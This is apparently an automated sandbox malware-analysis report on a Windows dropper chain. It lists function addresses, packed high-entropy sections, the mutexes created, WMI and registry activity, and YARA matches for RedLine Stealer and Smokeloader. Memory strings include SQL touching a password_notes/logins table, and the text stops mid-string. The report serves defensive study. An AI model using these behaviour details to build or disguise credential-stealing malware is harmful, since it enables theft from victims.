Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C45FD00	8_2_6C45FD00
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C470512	8_2_6C470512
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C46ED10	8_2_6C46ED10
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C480DD0	8_2_6C480DD0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4A85F0	8_2_6C4A85F0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C464640	8_2_6C464640
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C492E4E	8_2_6C492E4E
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C469E50	8_2_6C469E50
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C483E50	8_2_6C483E50
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4B6E63	8_2_6C4B6E63
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C44C670	8_2_6C44C670
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C495600	8_2_6C495600
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C487E10	8_2_6C487E10
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4A9E30	8_2_6C4A9E30
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4B76E3	8_2_6C4B76E3
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C44BEF0	8_2_6C44BEF0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C45FEF0	8_2_6C45FEF0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4AE680	8_2_6C4AE680
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C465E90	8_2_6C465E90
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4A4EA0	8_2_6C4A4EA0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C459F00	8_2_6C459F00
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C487710	8_2_6C487710
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C44DFE0	8_2_6C44DFE0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C476FF0	8_2_6C476FF0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4977A0	8_2_6C4977A0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C468850	8_2_6C468850
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C46D850	8_2_6C46D850
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C48F070	8_2_6C48F070
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C457810	8_2_6C457810
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C48B820	8_2_6C48B820
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C494820	8_2_6C494820
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4B50C7	8_2_6C4B50C7
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C46C0E0	8_2_6C46C0E0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4858E0	8_2_6C4858E0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4760A0	8_2_6C4760A0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C46A940	8_2_6C46A940
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C45D960	8_2_6C45D960
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C49B970	8_2_6C49B970
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4BB170	8_2_6C4BB170
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C485190	8_2_6C485190
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4A2990	8_2_6C4A2990
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C44C9A0	8_2_6C44C9A0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C47D9B0	8_2_6C47D9B0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C489A60	8_2_6C489A60
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C488AC0	8_2_6C488AC0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C461AF0	8_2_6C461AF0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C48E2F0	8_2_6C48E2F0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4BBA90	8_2_6C4BBA90
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4422A0	8_2_6C4422A0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C474AA0	8_2_6C474AA0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C45CAB0	8_2_6C45CAB0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4B2AB0	8_2_6C4B2AB0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C445340	8_2_6C445340
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C45C370	8_2_6C45C370
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C48D320	8_2_6C48D320
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4B53C8	8_2_6C4B53C8
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C44F380	8_2_6C44F380
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4FAC60	8_2_6C4FAC60
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5B6C00	8_2_6C5B6C00
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5CAC30	8_2_6C5CAC30
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C54ECD0	8_2_6C54ECD0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4EECC0	8_2_6C4EECC0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5BED70	8_2_6C5BED70
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C61AD50	8_2_6C61AD50
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C678D20	8_2_6C678D20
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C67CDC0	8_2_6C67CDC0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C586D90	8_2_6C586D90
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4F4DB0	8_2_6C4F4DB0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C58EE70	8_2_6C58EE70
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5D0E20	8_2_6C5D0E20
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4FAEC0	8_2_6C4FAEC0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C590EC0	8_2_6C590EC0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C576E90	8_2_6C576E90
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C55EF40	8_2_6C55EF40
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5B2F70	8_2_6C5B2F70
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C630F20	8_2_6C630F20
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4F6F10	8_2_6C4F6F10
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5CEFF0	8_2_6C5CEFF0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4F0FE0	8_2_6C4F0FE0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C638FB0	8_2_6C638FB0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4FEFB0	8_2_6C4FEFB0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5C4840	8_2_6C5C4840
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C540820	8_2_6C540820
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C57A820	8_2_6C57A820
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5F68E0	8_2_6C5F68E0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C528960	8_2_6C528960
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C546900	8_2_6C546900
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C60C9E0	8_2_6C60C9E0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5249F0	8_2_6C5249F0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5B09B0	8_2_6C5B09B0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5809A0	8_2_6C5809A0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5AA9A0	8_2_6C5AA9A0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C56CA70	8_2_6C56CA70
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C59EA00	8_2_6C59EA00
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5A8A30	8_2_6C5A8A30
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C56EA80	8_2_6C56EA80
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5F6BE0	8_2_6C5F6BE0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C590BA0	8_2_6C590BA0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C508460	8_2_6C508460
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C57A430	8_2_6C57A430
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C554420	8_2_6C554420
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5364D0	8_2_6C5364D0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C58A4D0	8_2_6C58A4D0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C61A480	8_2_6C61A480
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C548540	8_2_6C548540
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5F4540	8_2_6C5F4540
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C590570	8_2_6C590570
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C638550	8_2_6C638550
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C552560	8_2_6C552560
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C57E5F0	8_2_6C57E5F0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5BA5E0	8_2_6C5BA5E0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4E45B0	8_2_6C4E45B0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C54C650	8_2_6C54C650
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5146D0	8_2_6C5146D0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C54E6E0	8_2_6C54E6E0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C58E6E0	8_2_6C58E6E0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C570700	8_2_6C570700
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C51A7D0	8_2_6C51A7D0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C53E070	8_2_6C53E070
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5B8010	8_2_6C5B8010
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5BC000	8_2_6C5BC000
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C4E8090	8_2_6C4E8090
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5000B0	8_2_6C5000B0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5CC0B0	8_2_6C5CC0B0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C558140	8_2_6C558140

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: String function: 6C519B10 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: String function: 6C513620 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: String function: 6C47CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: String function: 6C4894D0 appears 90 times

Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: 0xqfQZufeQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0000000D.00000002.2735545518.0000000000D69000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000D.00000002.2954337786.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: Y-Cleaner.exe.13.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].13.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0xqfQZufeQ.exe	Static PE information: Section: ZLIB complexity 0.9973497104904632
Source: 0xqfQZufeQ.exe	Static PE information: Section: xzmpyxck ZLIB complexity 0.9942299607623318
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973497104904632
Source: axplong.exe.0.dr	Static PE information: Section: xzmpyxck ZLIB complexity 0.9942299607623318
Source: random[1].exe.6.dr	Static PE information: Section: dxkyhxuw ZLIB complexity 0.9950042715491485
Source: 0f39a8c7db.exe.6.dr	Static PE information: Section: dxkyhxuw ZLIB complexity 0.9950042715491485
Source: random[1].exe0.6.dr	Static PE information: Section: ZLIB complexity 0.998030909400545
Source: 8166ff9922.exe.6.dr	Static PE information: Section: ZLIB complexity 0.998030909400545
Source: random[1].exe1.6.dr	Static PE information: Section: jccfkdhg ZLIB complexity 0.9903267601929774
Source: 3f28c42ac4.exe.6.dr	Static PE information: Section: jccfkdhg ZLIB complexity 0.9903267601929774
Source: skotes.exe.9.dr	Static PE information: Section: ZLIB complexity 0.998030909400545
Source: random[3].exe.14.dr	Static PE information: Section: ZLIB complexity 0.9986840224847561
Source: random[3].exe.14.dr	Static PE information: Section: zqjesnms ZLIB complexity 0.994311055792034
Source: eb74aeb58b.exe.14.dr	Static PE information: Section: ZLIB complexity 0.9986840224847561
Source: eb74aeb58b.exe.14.dr	Static PE information: Section: zqjesnms ZLIB complexity 0.994311055792034
Source: random[1].exe.14.dr	Static PE information: Section: ZLIB complexity 0.998359375
Source: random[1].exe.14.dr	Static PE information: Section: hvnpreno ZLIB complexity 0.9949657112955347

Source: random[1].exe.14.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 8166ff9922.exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe0.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.9.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@100/111@100/15

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Code function: 8_2_6C4A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

8_2_6C4A7030

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4992:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: 0f39a8c7db.exe, 00000008.00000002.2529505786.000000006C67F000.00000002.00000001.01000000.00000014.sdmp, 0f39a8c7db.exe, 00000008.00000002.2521791013.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2489551392.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 0f39a8c7db.exe, 00000008.00000002.2529505786.000000006C67F000.00000002.00000001.01000000.00000014.sdmp, 0f39a8c7db.exe, 00000008.00000002.2521791013.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2489551392.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 0f39a8c7db.exe, 00000008.00000002.2529505786.000000006C67F000.00000002.00000001.01000000.00000014.sdmp, 0f39a8c7db.exe, 00000008.00000002.2521791013.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2489551392.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 0f39a8c7db.exe, 00000008.00000002.2529505786.000000006C67F000.00000002.00000001.01000000.00000014.sdmp, 0f39a8c7db.exe, 00000008.00000002.2521791013.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2489551392.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 0f39a8c7db.exe, 0f39a8c7db.exe, 00000008.00000002.2529505786.000000006C67F000.00000002.00000001.01000000.00000014.sdmp, 0f39a8c7db.exe, 00000008.00000002.2521791013.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2489551392.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 0f39a8c7db.exe, 00000008.00000002.2529505786.000000006C67F000.00000002.00000001.01000000.00000014.sdmp, 0f39a8c7db.exe, 00000008.00000002.2521791013.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2489551392.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 0f39a8c7db.exe, 00000008.00000002.2521791013.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2489551392.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 0f39a8c7db.exe, 00000008.00000003.2180137113.0000000005999000.00000004.00000020.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000003.2314428816.000000000598D000.00000004.00000020.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2318833845.0000000005376000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2335046857.0000000005359000.00000004.00000800.00020000.00000000.sdmp, eb74aeb58b.exe, 00000017.00000003.2319450522.000000000535B000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2358583226.0000000005796000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2337183227.0000000005718000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2358583226.00000000056FA000.00000004.00000800.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2342549946.00000000056FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE 